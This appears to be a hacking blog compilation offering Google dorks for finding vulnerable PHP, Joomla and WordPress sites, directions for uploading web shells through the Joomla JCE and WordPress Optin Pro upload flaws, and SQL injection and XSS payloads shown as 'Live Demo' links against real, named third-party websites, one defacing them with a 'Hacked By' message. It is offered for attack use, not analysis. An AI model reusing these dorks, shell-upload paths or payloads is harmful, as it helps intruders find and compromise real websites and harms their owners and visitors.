SQL 2014 DORK

SQL 2014 DORK SQL DORK 2014

  Nguồn: CEH
trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=

Exploit Joomla!: JCE

It has been a very long time that i haven't post here, so as for today i'm going to post a new tutorial on how to upload shell with method JCE.




Thing Required:

JCE Exploiter : DOWNLOAD




DORKS:


inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"

Exploit WordPress: Optin Pro - File Upload Vulnerability

Once again, i'm not gonna explain anything about this exploit since it is exactly the same as my previous post. So, i'm just gonna give you the dork and exploit.

DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/

EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php

SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php

Espacio Ecuador XSS & SQLI

Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

Pej Studio & Nissi Infotech & Plante Graffix - XSS

Dork:

intext:"Created By Nissi Infotech"


Exploits:

http://target.com/name.php?id= [XSS & SQLI]


Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E